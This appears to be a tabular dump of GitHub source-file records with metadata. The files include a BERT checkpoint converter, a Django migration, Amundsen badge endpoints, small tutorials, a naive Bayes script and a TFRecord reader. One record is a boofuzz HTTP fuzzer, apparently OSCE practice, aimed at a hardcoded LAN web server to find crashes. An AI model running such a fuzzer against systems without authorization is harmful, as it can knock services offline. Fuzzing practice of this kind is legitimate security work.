blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
92754d9d47c8bfc380e97bec2f9b21fca55de57f | ac3d3a45d7d6923bc0668bcdd38de31972860eaa | /HackerRank/1.Python/05.Math/004.ModDivmod.py | e0e5337b1eab7a6cc8ee60033f97072f53ba5b17 | [] | no_license | darpan-jain/DS-And-Algos | c17388d28ad6c1fc113e2da783904eb38a59223f | a9e54a4f1ac6ef0c1d5b056ca18dc59efdc3c648 | refs/heads/master | 2023-01-15T12:43:26.495033 | 2020-11-16T06:28:21 | 2020-11-16T06:28:21 | 294,034,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | '''
Question : Read in two integers, a and b, and print three lines.
The first line is the integer division a//b.
The second line is the result of the modulo operator a%b.
The third line prints the divmod of a and b.
Link : https://www.hackerrank.com/challenges/python-mod-divmod/problem
'''
if __name__ == '__main__':
    # Read the two integers, then print quotient, remainder, and the divmod pair.
    a = int(input())
    b = int(input())
    quotient, remainder = divmod(a, b)
    print(quotient)
    print(remainder)
    print((quotient, remainder))
| [
"noreply@github.com"
] | darpan-jain.noreply@github.com |
1a46332d256e0dfb90a730c3e144107fa8174cc5 | dd75ee3b5f9a4fa5c62dcd06df9b3847cacac515 | /src/transformers/convert_bert_original_tf2_checkpoint_to_pytorch.py | 0e37b24246ffc48cda0201db600653ca290e8dd5 | [
"Apache-2.0"
] | permissive | Aayushk26/transformers | 95da496c6186d4042b7c3cc94cb4d150b708851c | cfa26d2b412ac3494eef06506004ca857c115ad9 | refs/heads/master | 2022-12-08T04:52:07.944070 | 2020-08-18T12:38:54 | 2020-08-18T12:38:54 | 288,476,543 | 1 | 0 | Apache-2.0 | 2020-08-18T14:20:05 | 2020-08-18T14:20:05 | null | UTF-8 | Python | false | false | 9,650 | py | """
This script can be used to convert a head-less TF2.x Bert model to PyTorch,
as published on the official GitHub: https://github.com/tensorflow/models/tree/master/official/nlp/bert
TF2.x uses different variable names from the original BERT (TF 1.4) implementation.
The script re-maps the TF2.x Bert weight names to the original names, so the model can be imported with Huggingface/transformer.
You may adapt this script to include classification/MLM/NSP/etc. heads.
"""
import argparse
import logging
import os
import re
import tensorflow as tf
import torch
from transformers import BertConfig, BertModel
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def load_tf2_weights_in_bert(model, tf_checkpoint_path, config):
    """Copy the weights of a head-less TF2.x BERT checkpoint into *model* in place.

    Args:
        model: target ``transformers.BertModel`` whose parameters are overwritten.
        tf_checkpoint_path: path to the TF2.x checkpoint (tensorflow/models format).
        config: ``BertConfig`` matching the checkpoint; ``num_hidden_layers`` is
            used to tell encoder layers apart from the pooler.

    Returns:
        The same ``model`` instance with its weights replaced.

    Raises:
        ValueError: if the checkpoint contains extra heads (MLM/NSP), an unknown
            embedding layer, or a TF variable whose shape does not match the
            corresponding PyTorch parameter.
    """
    tf_path = os.path.abspath(tf_checkpoint_path)
    logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
    # Load weights from TF model
    init_vars = tf.train.list_variables(tf_path)
    names = []
    arrays = []
    layer_depth = []
    for full_name, shape in init_vars:
        name = full_name.split("/")
        # Checkpoint bookkeeping and optimizer slot variables carry no model weights.
        if full_name == "_CHECKPOINTABLE_OBJECT_GRAPH" or name[0] in ["global_step", "save_counter"]:
            logger.info(f"Skipping non-model layer {full_name}")
            continue
        if "optimizer" in full_name:
            logger.info(f"Skipping optimization layer {full_name}")
            continue
        if name[0] == "model":
            # ignore initial 'model'
            name = name[1:]
        # figure out how many levels deep the name is
        depth = 0
        for _name in name:
            if _name.startswith("layer_with_weights"):
                depth += 1
            else:
                break
        layer_depth.append(depth)
        # read data
        array = tf.train.load_variable(tf_path, full_name)
        names.append("/".join(name))
        arrays.append(array)
    logger.info(f"Read a total of {len(arrays):,} layers")
    # Sanity check: a head-less checkpoint nests every weight exactly one
    # 'layer_with_weights' level deep; anything else means extra heads exist.
    if len(set(layer_depth)) != 1:
        raise ValueError(f"Found layer names with different depths (layer depth {list(set(layer_depth))})")
    layer_depth = list(set(layer_depth))[0]
    if layer_depth != 1:
        raise ValueError(
            "The model contains more than just the embedding/encoder layers. This script does not handle MLM/NSP heads."
        )
    # convert layers
    logger.info("Converting weights...")
    for full_name, array in zip(names, arrays):
        name = full_name.split("/")
        pointer = model  # walked down to the target PyTorch parameter
        trace = []  # human-readable dotted path; used for reshape decisions and logging
        for i, m_name in enumerate(name):
            if m_name == ".ATTRIBUTES":
                # variable names end with .ATTRIBUTES/VARIABLE_VALUE
                break
            if m_name.startswith("layer_with_weights"):
                layer_num = int(m_name.split("-")[-1])
                if layer_num <= 2:
                    # embedding layers
                    # layer_num 0: word_embeddings
                    # layer_num 1: position_embeddings
                    # layer_num 2: token_type_embeddings
                    # handled below when the 'embeddings' path component is seen
                    continue
                elif layer_num == 3:
                    # embedding LayerNorm
                    trace.extend(["embeddings", "LayerNorm"])
                    pointer = getattr(pointer, "embeddings")
                    pointer = getattr(pointer, "LayerNorm")
                elif layer_num > 3 and layer_num < config.num_hidden_layers + 4:
                    # encoder layers
                    trace.extend(["encoder", "layer", str(layer_num - 4)])
                    pointer = getattr(pointer, "encoder")
                    pointer = getattr(pointer, "layer")
                    pointer = pointer[layer_num - 4]
                elif layer_num == config.num_hidden_layers + 4:
                    # pooler layer
                    trace.extend(["pooler", "dense"])
                    pointer = getattr(pointer, "pooler")
                    pointer = getattr(pointer, "dense")
            elif m_name == "embeddings":
                trace.append("embeddings")
                pointer = getattr(pointer, "embeddings")
                # layer_num was set by the preceding 'layer_with_weights-N' component
                if layer_num == 0:
                    trace.append("word_embeddings")
                    pointer = getattr(pointer, "word_embeddings")
                elif layer_num == 1:
                    trace.append("position_embeddings")
                    pointer = getattr(pointer, "position_embeddings")
                elif layer_num == 2:
                    trace.append("token_type_embeddings")
                    pointer = getattr(pointer, "token_type_embeddings")
                else:
                    # BUGFIX: was a plain string literal, so "{full_name}" was
                    # printed verbatim instead of the offending layer name.
                    raise ValueError(f"Unknown embedding layer with name {full_name}")
                trace.append("weight")
                pointer = getattr(pointer, "weight")
            elif m_name == "_attention_layer":
                # self-attention layer
                trace.extend(["attention", "self"])
                pointer = getattr(pointer, "attention")
                pointer = getattr(pointer, "self")
            elif m_name == "_attention_layer_norm":
                # output attention norm
                trace.extend(["attention", "output", "LayerNorm"])
                pointer = getattr(pointer, "attention")
                pointer = getattr(pointer, "output")
                pointer = getattr(pointer, "LayerNorm")
            elif m_name == "_attention_output_dense":
                # output attention dense
                trace.extend(["attention", "output", "dense"])
                pointer = getattr(pointer, "attention")
                pointer = getattr(pointer, "output")
                pointer = getattr(pointer, "dense")
            elif m_name == "_output_dense":
                # output dense
                trace.extend(["output", "dense"])
                pointer = getattr(pointer, "output")
                pointer = getattr(pointer, "dense")
            elif m_name == "_output_layer_norm":
                # output LayerNorm
                # NOTE: the original contained a second, unreachable
                # '_output_layer_norm' branch further down; it has been removed.
                trace.extend(["output", "LayerNorm"])
                pointer = getattr(pointer, "output")
                pointer = getattr(pointer, "LayerNorm")
            elif m_name == "_key_dense":
                # attention key
                trace.append("key")
                pointer = getattr(pointer, "key")
            elif m_name == "_query_dense":
                # attention query
                trace.append("query")
                pointer = getattr(pointer, "query")
            elif m_name == "_value_dense":
                # attention value
                trace.append("value")
                pointer = getattr(pointer, "value")
            elif m_name == "_intermediate_dense":
                # attention intermediate dense
                trace.extend(["intermediate", "dense"])
                pointer = getattr(pointer, "intermediate")
                pointer = getattr(pointer, "dense")
            # weights & biases
            elif m_name in ["bias", "beta"]:
                trace.append("bias")
                pointer = getattr(pointer, "bias")
            elif m_name in ["kernel", "gamma"]:
                trace.append("weight")
                pointer = getattr(pointer, "weight")
            else:
                logger.warning(f"Ignored {m_name}")
        # for certain layers reshape is necessary
        trace = ".".join(trace)
        if re.match(r"(\S+)\.attention\.self\.(key|value|query)\.(bias|weight)", trace) or re.match(
            r"(\S+)\.attention\.output\.dense\.weight", trace
        ):
            array = array.reshape(pointer.data.shape)
        if "kernel" in full_name:
            # TF stores dense kernels transposed relative to torch.nn.Linear weights.
            array = array.transpose()
        if pointer.shape == array.shape:
            pointer.data = torch.from_numpy(array)
        else:
            raise ValueError(
                f"Shape mismatch in layer {full_name}: Model expects shape {pointer.shape} but layer contains shape: {array.shape}"
            )
        logger.info(f"Successfully set variable {full_name} to PyTorch layer {trace}")
    return model
def convert_tf2_checkpoint_to_pytorch(tf_checkpoint_path, config_path, pytorch_dump_path):
    """Build a BertModel from *config_path*, fill it with the TF2 checkpoint
    weights, and write the resulting state_dict to *pytorch_dump_path*."""
    # Instantiate an empty PyTorch model from the JSON config.
    logger.info(f"Loading model based on config from {config_path}...")
    bert_config = BertConfig.from_json_file(config_path)
    bert_model = BertModel(bert_config)

    # Populate it from the TF2.x checkpoint.
    logger.info(f"Loading weights from checkpoint {tf_checkpoint_path}...")
    load_tf2_weights_in_bert(bert_model, tf_checkpoint_path, bert_config)

    # Persist only the weights (state_dict), not the full module.
    logger.info(f"Saving PyTorch model to {pytorch_dump_path}...")
    torch.save(bert_model.state_dict(), pytorch_dump_path)
if __name__ == "__main__":
    # CLI entry point: all three paths are mandatory.
    cli_parser = argparse.ArgumentParser()
    cli_parser.add_argument(
        "--tf_checkpoint_path", type=str, required=True, help="Path to the TensorFlow 2.x checkpoint path."
    )
    cli_parser.add_argument(
        "--bert_config_file",
        type=str,
        required=True,
        help="The config json file corresponding to the BERT model. This specifies the model architecture.",
    )
    cli_parser.add_argument(
        "--pytorch_dump_path",
        type=str,
        required=True,
        help="Path to the output PyTorch model (must include filename).",
    )
    cli_args = cli_parser.parse_args()
    convert_tf2_checkpoint_to_pytorch(cli_args.tf_checkpoint_path, cli_args.bert_config_file, cli_args.pytorch_dump_path)
| [
"noreply@github.com"
] | Aayushk26.noreply@github.com |
5dc3567616c55e88f1045f9cd29aff35cb16c9cc | 210b54b07543bb2a8ecf060595d7398c8a01d477 | /183.Generator Comprehension - Python tutorial 181.py | 7c03910b6b11616877cad3454ecacc6da2340451 | [] | no_license | ArifSanaullah/Python_codes | 059482f8096fd14f2331e7bcf512b33727a5ac45 | d99f43bf6a6bc49fcd4ee57704427ef42618cb30 | refs/heads/master | 2020-05-28T09:31:07.939306 | 2019-05-28T06:11:46 | 2019-05-28T06:11:46 | 188,956,563 | 0 | 0 | null | 2019-05-28T05:54:04 | 2019-05-28T04:56:56 | Python | UTF-8 | Python | false | false | 157 | py | # 183.Generator Comprehension - Python tutorial 181
# Lazily build the squares of 1..10 with a generator expression.
square = (num ** 2 for num in range(1, 11))

# The first traversal consumes every value.
for value in square:
    print(value)

# A generator is single-use: this second loop yields nothing.
for value in square:
    print(value)
"noreply@github.com"
] | ArifSanaullah.noreply@github.com |
a77b59525465fe6d04d96b76b95fc579ef7c18ee | 5db0ec765300952cd35c3b285b811330ac0dc882 | /blog/migrations/0001_initial.py | 759607b6c97d195cd87efea10641d0ef03a8de61 | [] | no_license | igorlimasan/my-first-blog | 4d0705c68e29d4456ca60ec1a123114e844a8bb8 | abe0aace813071686ea42e8d480a8f01ed719c74 | refs/heads/master | 2020-03-21T10:02:39.227040 | 2018-06-23T20:28:15 | 2018-06-23T20:28:15 | 138,430,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # Generated by Django 2.0.6 on 2018-06-23 20:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the blog ``Post`` table."""

    initial = True

    dependencies = [
        # The ``author`` foreign key below targets the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                # created_date defaults to "now"; published_date stays empty until publication.
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"igorlimadossantos.igorlimasan@gmail.com"
] | igorlimadossantos.igorlimasan@gmail.com |
9613945776b69a0fff44683c84fd948fb7958ec4 | 925a558e70aa4559ef72727f82137ee7259af1f8 | /metadata/metadata_service/api/badge.py | 8dfe4a464e74eeb23a2b8a9e5d861c9b711b9202 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | louisnow/amundsen | 6f523d4bcbe8644669e0a7c5e1bc42560a066126 | 0b871cb58ca32e7ce150c5f60815e9f6801c10bc | refs/heads/main | 2023-07-08T09:52:59.807957 | 2021-08-10T07:15:03 | 2021-08-10T08:49:28 | 394,553,691 | 1 | 0 | Apache-2.0 | 2021-08-10T06:50:18 | 2021-08-10T06:50:17 | null | UTF-8 | Python | false | false | 4,348 | py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
from http import HTTPStatus
from typing import Any, Iterable, Mapping, Tuple, Union
from amundsen_common.entity.resource_type import ResourceType
from flasgger import swag_from
from flask import current_app as app
from flask_restful import Resource, fields, marshal
from metadata_service.entity.badge import Badge
from metadata_service.exception import NotFoundException
from metadata_service.proxy import get_proxy_client
from metadata_service.proxy.base_proxy import BaseProxy
badge_fields = {
'badge_name': fields.String,
'category': fields.String,
}
badges_fields = {
'badges': fields.List(fields.Nested(badge_fields))
}
class BadgeAPI(Resource):
    """Read-only endpoint that lists every badge known to the metadata store."""

    def __init__(self) -> None:
        # Proxy client is resolved from app config (e.g. Neo4j/Atlas backend).
        self.client = get_proxy_client()
        super(BadgeAPI, self).__init__()

    @swag_from('swagger_doc/badge/badge_get.yml')
    def get(self) -> Iterable[Union[Mapping, int, None]]:
        """
        API to get all existing badges
        """
        badges = self.client.get_badges()
        # Serialize through badges_fields so only badge_name/category are exposed.
        return marshal({'badges': badges}, badges_fields), HTTPStatus.OK
class BadgeCommon:
    """Shared add/delete badge logic reused by resource-specific badge endpoints."""

    def __init__(self, client: BaseProxy) -> None:
        self.client = client

    def put(self, id: str, resource_type: ResourceType,
            badge_name: str,
            category: str = '') -> Tuple[Any, HTTPStatus]:
        """Attach a badge to a resource.

        ``category`` is mandatory and the (badge_name, category) pair must be
        present in the app's WHITELIST_BADGES config; otherwise a 404 payload
        is returned.
        """
        if category == '':
            return \
                {'message': f'The badge {badge_name} for resource id {id} is not added successfully because '
                            f'category `{category}` parameter is required '
                            'for badges'}, \
                HTTPStatus.NOT_FOUND

        # TODO check resource type is column when adding a badge of category column after
        # implementing column level badges
        whitelist_badges = app.config.get('WHITELIST_BADGES', [])
        # (renamed from misspelled 'incomimg_badge')
        incoming_badge = Badge(badge_name=badge_name,
                               category=category)
        # need to check whether the badge combination is part of the whitelist:
        in_whitelist = any(
            incoming_badge.badge_name == badge.badge_name and incoming_badge.category == badge.category
            for badge in whitelist_badges
        )
        if not in_whitelist:
            return \
                {'message': f'The badge {badge_name} with category {category} for resource '
                            f'id {id} and resource_type {resource_type.name} is not added successfully because '
                            'this combination of values is not part of the whitelist'}, \
                HTTPStatus.NOT_FOUND
        try:
            self.client.add_badge(id=id,
                                  badge_name=badge_name,
                                  category=category,
                                  resource_type=resource_type)
            return {'message': f'The badge {badge_name} with category {category} was '
                               f'added successfully to resource with id {id}'}, HTTPStatus.OK
        except Exception:
            # Broad catch kept deliberately: any proxy failure surfaces to the
            # caller as a 404 payload (the bound exception was never used).
            return {'message': f'The badge {badge_name} with category {category} '
                               f'for resource id {id} and resource_type {resource_type.name} failed to '
                               'be added'}, \
                HTTPStatus.NOT_FOUND

    def delete(self, id: str, badge_name: str,
               category: str,
               resource_type: ResourceType) -> Tuple[Any, HTTPStatus]:
        """Remove a badge from a resource; 404 payload if the proxy reports it missing."""
        try:
            self.client.delete_badge(id=id,
                                     resource_type=resource_type,
                                     badge_name=badge_name,
                                     category=category)
            return \
                {'message': f'The badge {badge_name} with category {category} for resource '
                            f'id {id} and resource_type {resource_type.name} was deleted successfully'}, \
                HTTPStatus.OK
        except NotFoundException:
            return \
                {'message': f'The badge {badge_name} with category {category} for resource '
                            f'id {id} and resource_type {resource_type.name} was not deleted successfully'}, \
                HTTPStatus.NOT_FOUND
| [
"noreply@github.com"
] | louisnow.noreply@github.com |
99d5b758ec79459222cf162676506bc77b04cc10 | b3569dbb9fdc5ef9ba49ca7a548621f621f60e34 | /practice/efsws/http_fuzzer.py | 5258707ae1bbd76d9f6ba686f2558f59483cc290 | [] | no_license | solucionestux/OSCE | 99a0e2aab30be018a3c3a933109abe2858e46f0e | 4b394b1a293e0ab804e402506e73b1623118f53f | refs/heads/master | 2023-03-15T22:54:25.808533 | 2020-08-24T02:31:10 | 2020-08-24T02:31:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,899 | py | #!/usr/bin/python
from boofuzz import *
from sys import exit
host = '192.168.1.250'
port = 80
# Checks if the connection is still open or if a banner is sent back. If not, the fuzzer quits. Good for stopping the script after crashing the program.
def get_banner(target, my_logger, session, *args, **kwargs):
banner_template = "Please enter your username and password to login"
try:
banner = target.recv(10000)
except:
print "Unable to connect. Target is down. Exiting."
exit(1)
my_logger.log_check('Receiving banner..')
if banner_template in banner:
my_logger.log_pass('banner received')
else:
my_logger.log_fail('No banner received')
print "No banner received, exiting.."
exit(1)
def main():
    """Fuzz the HTTP request line of the target web server with boofuzz.

    Only the Method and Request-URI primitives are fuzzable; delimiters and
    the HTTP version are held fixed so requests stay parseable.
    """
    # Create logging function. Outputs to a .csv file
    csv_log = open('fuzz_results.csv', 'wb') ## create a csv file
    my_logger = [FuzzLoggerCsv(file_handle=csv_log)] ### create a FuzzLoggerCSV object with the file handle of our csv file
    # Create the session and set the logging function
    session = Session(
        target=Target(
            connection = SocketConnection(host, port, proto='tcp'),
        ),
        fuzz_loggers=my_logger, ## set my_logger (csv) as the logger for the session
    )
    # Define the parameters to fuzz.
    s_initialize(name="Request")
    with s_block("Request-Line"):
        # Method and Request-URI are the fuzzable fields; spacing/version are static.
        s_group("Method", ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE'])
        s_delim(" ", name='space-1', fuzzable = False)
        s_string("/login.htm", name='Request-URI')
        s_delim(" ", name='space-2', fuzzable = False)
        s_string('HTTP/1.1', name='HTTP-Version', fuzzable = False)
        s_static("\r\n", name="Request-Line-CRLF")
    # Blank line terminating the HTTP request.
    s_static("\r\n", "Request-CRLF")
    session.connect(s_get("Request"))
    session.fuzz() # call the function to begin fuzzing
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | solucionestux.noreply@github.com |
9f53a446aba2f9f7ee04a17301a5b4a1ff43edcb | 5bf3252e94d9357adbec2153036cde0e4bb755f7 | /nb.py | 13fdd36b9fd9c19d37bbb8d9d832333fb8d5ccbe | [] | no_license | gowtham1197/Android-Malware-Detection | 9a4d2277b70a56c174f86398bcde73d7665af884 | df769f6c88caf177bba3c6981a62000852003d68 | refs/heads/master | 2021-04-03T07:48:47.415366 | 2018-03-13T18:29:36 | 2018-03-13T18:29:36 | 125,095,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,835 | py | import csv
import math
def gaus(A,cl,col,l, fold_size):
	"""Gaussian likelihood of feature value A for class cl.

	Mean/variance of feature column `col` are estimated from all rows EXCEPT
	the held-out fold [l, l+fold_size).  Relies on module-level globals
	`dataset`, `actual`, `no_row`, `no_col` defined in the script body.
	"""
	count=0.0
	sum1=0.0
	dsq=0.0
	#print "Training"
	# First pass: mean of the feature over training rows of class cl.
	for i in range(no_row):
		if(i>=l and i<l+ fold_size):
			continue
		if(actual[dataset[i][no_col]]==cl):
			sum1+=float(dataset[i][col])
			count+=1
	u=sum1/count
	# Second pass: sum of squared deviations for the sample variance.
	for i in range(no_row):
		if(i>=l and i<l+ fold_size):
			continue
		if(actual[dataset[i][no_col]]==cl):
			diff=float(dataset[i][col])-u
			dsq+=diff*diff
	varience=dsq/(count-1)
	std=math.sqrt(varience)
	# Gaussian pdf: exp(-(A-u)^2 / (2*var)) / (sqrt(2*pi)*std)
	power=-((A-u)*(A-u))/(2*varience)
	nume=math.exp(power)
	den=math.sqrt(2*math.pi)*std
	ans=nume/den
	#print("ans:",ans)
	return ans
def crossvalid(prob1,prob2, fold_size):
	"""10-fold cross validation of the naive Bayes classifier.

	prob1/prob2 are the class priors.  Each fold [l, l+fold_size) is held out
	in turn, its rows are classified by prior * product of per-feature
	Gaussian likelihoods, and the mean accuracy (1 - average error rate)
	over all folds is returned.  Uses module globals `dataset`, `actual`,
	`no_row`, `no_col`.
	"""
	l=0
	count=0
	eravg=0.0
	#print no_row
	k=1
	#print "Testing"
	while(l<no_row):
		ans=[]
		act=[]
		errate=0.0
		err=0.0
		#print("Training")
		# Classify every row of the current held-out fold.
		for i in range(no_row):
			if(not(i>=l and i<l+fold_size)):
				continue
			#print("prob1",prob1)
			pro1=prob1
			pro2=prob2
			act.append((actual[dataset[i][no_col]])*0.1)
			#print(pro1)
			#print(pro2)
			# Posterior (up to normalization): prior * product of likelihoods.
			for j in range(no_col):
				pro1*=gaus(float(dataset[i][j]),0.0,j,l, fold_size)
				pro2*=gaus(float(dataset[i][j]),1.0,j,l, fold_size)
			if(pro1>pro2):
				ans1=0.0
				ans.append(ans1)
			else:
				ans1=1.0
				ans.append(ans1)
			if(ans1!=actual[dataset[i][no_col]]):
				err+=1
		print ans
		print act
		errate=err/ fold_size
		print('Fold %d' %k)
		erate=errate*100
		print('Error Rate %f' %erate)
		srate=(1-errate)*100
		print('Success Rate %f' %srate)
		#print errate
		k+=1
		eravg+=errate
		count+=1
		l+=fold_size
	#print("count",count)
	#print count
	eravg=eravg/count
	# Average accuracy across all folds.
	return (1-eravg)
def nb(fold_size):
	"""Estimate class priors, run 10-fold CV, and return the average accuracy."""
	p1=0.0
	p2=0.0
	#print(no_row)
	# Count rows per class to form the priors.
	for i in range(no_row):
		if(actual[dataset[i][no_col]]==0):
			p1+=1
		else:
			p2+=1
	prob1=p1/no_row
	prob2=p2/no_row
	print ("Probability of occurance of class R : %f" %prob1)
	print ("Probability of occurance of class M : %f" %prob2)
	return (crossvalid(prob1,prob2, fold_size))
# --- Script entry: load the chosen CSV dataset and run 10-fold naive Bayes ---
dataset = list(list())
# NOTE(review): numeric comparison of input() implies Python 2 semantics.
option=input("1.Sonar 2.Iris 3.Spectf 4.Diabetes\n")
if(option==1):
	filename = 'sonar.csv'
elif(option==2):
	filename = 'iris.csv'
elif(option==3):
	filename = 'spectf.csv'
else:
	filename = 'diabetes.csv'
with open(filename, 'rb') as csvfile:
	r = csv.reader(csvfile)
	for k,i in enumerate(r):
		#if k==0:
		#	continue
		dataset.append(i)
# Last column is the class label; the rest are features.
no_col = len(dataset[1])-1
print("No.of features in the current dataset are %d" %no_col)
no_row = len(dataset)
fold_size=no_row/10
# Collect the label column and map the two class labels to 1/0.
cvs=[]
for i in range(len(dataset)):
	cvs.append(dataset[i][-1])
actual1=set(cvs)
actual1=list(actual1)
#actual1[0]=1.0
#actual1[1]=0.0
#for i in range(len(actual1)):
	#print(dataset[i])
# NOTE(review): which label maps to 1 depends on set iteration order.
actual = { actual1[0] : 1, actual1[1] : 0}
#print actual
prob1=0.0
prob2=0.0
print("the average accuracy rate is:" ,nb(fold_size)*100)
| [
"noreply@github.com"
] | gowtham1197.noreply@github.com |
dd2000e4cda97744f227d10a8d58549238968293 | 570d589e9b56ab2e1f5f595f48ee05924f7f6cae | /Python/Django_projects/model_practice/apps/model/models.py | a389b166c3b48dff9117d493e35789250fbc4dcd | [] | no_license | WillieShubert/DojoAssignments | 96853f019210fcbc384ac6b4c69450f31b4e47d4 | 1687399427dda566551dcd221de824a913dbe3ee | refs/heads/master | 2021-01-11T17:53:43.824115 | 2017-05-05T18:09:30 | 2017-05-05T18:09:30 | 79,863,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
    """Minimal person record used for ORM practice."""
    first_name = models.CharField(max_length=38)
    last_name = models.CharField(max_length= 38)
    # Timestamps are maintained automatically by Django on insert/update.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
| [
"noreply@github.com"
] | WillieShubert.noreply@github.com |
8be1ab78dd73cd3dcca83e57b7dd6dead0a5058d | 7f4fae8e0a9e29fc3abee784a2d7d0beb8252bd5 | /typings/wulifang/vendor/pathlib2_unicode/__version__.pyi | 3f08878a765c1a960e0eabcbf37496a185f773f2 | [] | no_license | WuLiFang/Nuke | a303646e927c9745f2eaf8dad4e5e1ccc09a30e7 | 49df48ded0985771147b1a40707b5454291eab19 | refs/heads/master | 2023-07-21T13:36:27.423572 | 2023-07-17T10:34:04 | 2023-07-17T10:34:04 | 100,696,180 | 16 | 5 | null | 2020-03-08T11:50:16 | 2017-08-18T09:28:26 | Python | UTF-8 | Python | false | false | 420 | pyi | """
This type stub file was generated by pyright.
"""
import datetime as _dt
import six
# Release metadata exported by pathlib2 (values filled in at package build time).
VERSION: six.text_type
RELEASE_DATE: _dt.datetime
# Provenance of the git commit the release was built from.
LAST_GIT_COMMIT_DESCRIBE: six.text_type
LAST_GIT_COMMIT_HASH: six.text_type
LAST_GIT_COMMIT_AUTHOR_NAME: six.text_type
LAST_GIT_COMMIT_AUTHOR_EMAIL: six.text_type
LAST_GIT_COMMIT_AUTHOR_DATE: _dt.datetime
LAST_GIT_COMMIT_SUBJECT: six.text_type
LAST_GIT_COMMIT_BODY: six.text_type
| [
"NateScarlet@Gmail.com"
] | NateScarlet@Gmail.com |
d3be4a6716e2f39f4f4bbaa448772970dd601f3c | c66f4f5eee07a5c2617d61f3a2eee988ac18e150 | /tutorial/read_real_record.py | 64debd01db184a38e9f45fb5aa7fe7bb3409c4bd | [] | no_license | ykicisk/TFModel | 65705f621cb39b4e00ccba281bce604103d2e8bb | f968e2ef2c47eff7cb74e5b2a6828736d1fbadb1 | refs/heads/master | 2021-01-12T02:31:43.467723 | 2017-01-04T22:17:19 | 2017-01-04T22:17:19 | 78,057,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import glob
import argparse as ap
import tensorflow as tf
def main(src_glob):
    """Read TFRecord examples matching *src_glob* through a shuffled batch queue.

    Demonstrates the TF1 queue-runner input pipeline:
    string_input_producer -> TFRecordReader -> parse_single_example ->
    shuffle_batch, then drains batches inside a Session until the epoch ends.
    """
    print "get filepaths"
    filepaths = glob.glob(src_glob)
    print "reader test!!"
    num_epochs = None
    file_queue = tf.train.string_input_producer(filepaths,
                                                num_epochs=num_epochs,
                                                shuffle=True)
    reader = tf.TFRecordReader()
    key, selialized_data = reader.read(file_queue)  # key => filepath:num
    print type(key), type(selialized_data)
    # dim
    # Fixed-length feature spec: 5 time steps per feature group.
    features_dict = {
        "daily": tf.FixedLenFeature([5, 56], tf.float32),
        "weekly": tf.FixedLenFeature([5, 58], tf.float32),
        "monthly": tf.FixedLenFeature([5,58], tf.float32),
        "label": tf.FixedLenFeature([5,1], tf.float32)
    }
    features = tf.parse_single_example(selialized_data,
                                       features=features_dict)
    batch_size = 10
    # min_after_dequeue defines how big a buffer we will randomly sample
    # from -- bigger means better shuffling but slower start up and more
    # memory used.
    # capacity must be larger than min_after_dequeue and the amount larger
    # determines the maximum we will prefetch. Recommendation:
    # min_after_dequeue + (num_threads + a small safety margin) * batch_size
    num_threads = 1
    min_after_dequeue = batch_size * 100
    capacity = min_after_dequeue + 3 * batch_size
    features_batch = tf.train.shuffle_batch(
        features,
        batch_size=batch_size,
        capacity=capacity,
        min_after_dequeue=min_after_dequeue,
        num_threads=num_threads,
        allow_smaller_final_batch=True
    )
    print type(features_batch)
    for fgroup, batch in features_batch.items():
        print fgroup, type(batch)
    init_op = [tf.initialize_all_variables(),
               tf.initialize_local_variables()]
    with tf.Session() as sess:
        sess.run(init_op)
        # Queue runners feed the input pipeline in background threads.
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)
        try:
            # mini-batch processing loop
            while not coord.should_stop():
                key_ = sess.run(key)
                print key_
                sample = sess.run(features_batch.values())
                print sample
                # training etc. would go here
        except tf.errors.OutOfRangeError:
            print "epoch end"
        finally:
            print "===finally==="
            coord.request_stop()
            coord.join(threads)
if __name__ == "__main__":
    description = """start"""
    # Formatter combining default-value display with raw description text.
    class Formatter(ap.ArgumentDefaultsHelpFormatter,
                    ap.RawDescriptionHelpFormatter):
        pass
    parser = ap.ArgumentParser(description=description,
                               formatter_class=Formatter)
    parser.add_argument("src", help="input tfrecord path (glob format)")
    args = parser.parse_args()
